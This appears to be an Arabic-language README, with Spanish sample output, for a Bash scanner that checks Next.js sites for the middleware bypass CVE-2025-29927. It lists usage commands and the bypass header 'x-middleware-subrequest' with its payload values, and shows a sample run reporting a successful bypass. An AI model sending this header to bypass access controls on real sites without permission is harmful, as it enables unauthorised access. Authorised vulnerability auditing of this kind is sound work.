
CVE-2025-29927 مدقق الاستغلال
أداة آلية بلغة Bash لاكتشاف تطبيقات Next.js المعرضة لـ تجاوز الوسيطة CVE-2025-29927، وفقًا لبحث Zhero Web Security.
bashwhatwebcurlقم بتثبيتها في Debian/Ubuntu باستخدام:
sudo apt install whatweb curl
./CVE-2025-29927.sh -u https://example.com
أنشئ ملفًا باسم urls.txt يحتوي على عنوان URL واحد في كل سطر:
https://target1.com
https://target2.com
نفذ:
./nextjs_bypass_checker_v2.sh -l urls.txt
التعرف على Next.js
whatweb لاكتشاف التقنية./_next/static/BUILD_ID و _buildManifest.js.كشف الوسيطة
X-Middleware-RewriteX-Middleware-Set-Cookieاختبار التجاوز
x-middleware-subrequest ويتم كشف الرؤوس.[*] Analizando: https://victima.com
[+] WhatWeb:
-> Detectado: Next.js[12.2.0]
[+] BUILD_ID: 3fjd92hf8
[+] Versión detectada: 12.2.0
[+] Middleware activo (cabeceras detectadas):
X-Middleware-Rewrite: /not-found/locale=en
[+] Probando exploits:
-> x-middleware-subrequest: middleware -> ✅ BYPASS EXITOSO (cabeceras desaparecieron)
-> x-middleware-subrequest: src/middleware -> ❌ Middleware no evadido
[*] Finalizado: https://victima.com
هذا السكربت لأغراض تعليمية والتدقيق المأذون به فقط. لا تستخدمه ضد أهداف دون إذن. قد يشكل الاستخدام غير المشروع نشاطًا غير قانوني.
بناءً على بحث: Zhero Web Security